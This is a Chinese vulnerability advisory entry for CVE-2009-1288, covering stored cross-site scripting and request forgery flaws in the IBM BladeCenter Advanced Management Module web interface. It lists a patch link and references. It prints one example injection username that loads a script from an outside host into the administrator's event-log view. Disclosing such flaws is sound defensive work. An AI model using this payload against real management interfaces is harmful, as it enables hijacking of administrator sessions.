漏洞信息详情

IBM BladeCenter高级管理模块 多个跨站脚本和跨站请求伪造漏洞

  • CNNVD编号:CNNVD-200904-263
  • 危害等级: 中危
  • CVE编号: CVE-2009-1288
  • 漏洞类型: 跨站脚本
  • 发布时间: 2009-04-13
  • 威胁类型: 远程
  • 更新时间: 2009-04-18
  • 厂        商: ibm
  • 漏洞来源: Henri Lindberg h...

漏洞简介

IBM BladeCenter是美国IBM公司的系列高性能刀片服务器。

BladeCenter所使用的高级管理模块(AMM)的Web管理接口没有正确地过滤用户所提交的输入和请求。如果用户使用恶意的凭据试图登录的话,AMM会在事件日志页面记录用户所提交的凭据,之后管理员查看事件日志时就会执行所注入的内容。例如,攻击者可以使用以下用户名登录导致注入:

JavaScript:>/script< >script src=\"//l7.fi\"< >/script< >script<

漏洞公告

目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:

http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076206 amp;brandind=5000020

参考网址

来源: BID

名称: 34447

链接:http://www.securityfocus.com/bid/34447

来源: BUGTRAQ

名称: 20090409 IBM BladeCenter Advanced Management Module Multiple vulnerabilities

链接:http://www.securityfocus.com/archive/1/archive/1/502582/100/0/threaded

来源: MISC

链接:http://www.louhinetworks.fi/advisory/ibm_090409.txt

来源: SECTRACK

名称: 1022025

链接:http://securitytracker.com/id?1022025

来源: OSVDB

名称: 53658

链接:http://osvdb.org/53658

来源: OSVDB

名称: 53657

链接:http://osvdb.org/53657

补丁

    暂无

漏洞信息快速查询

相关漏洞

更多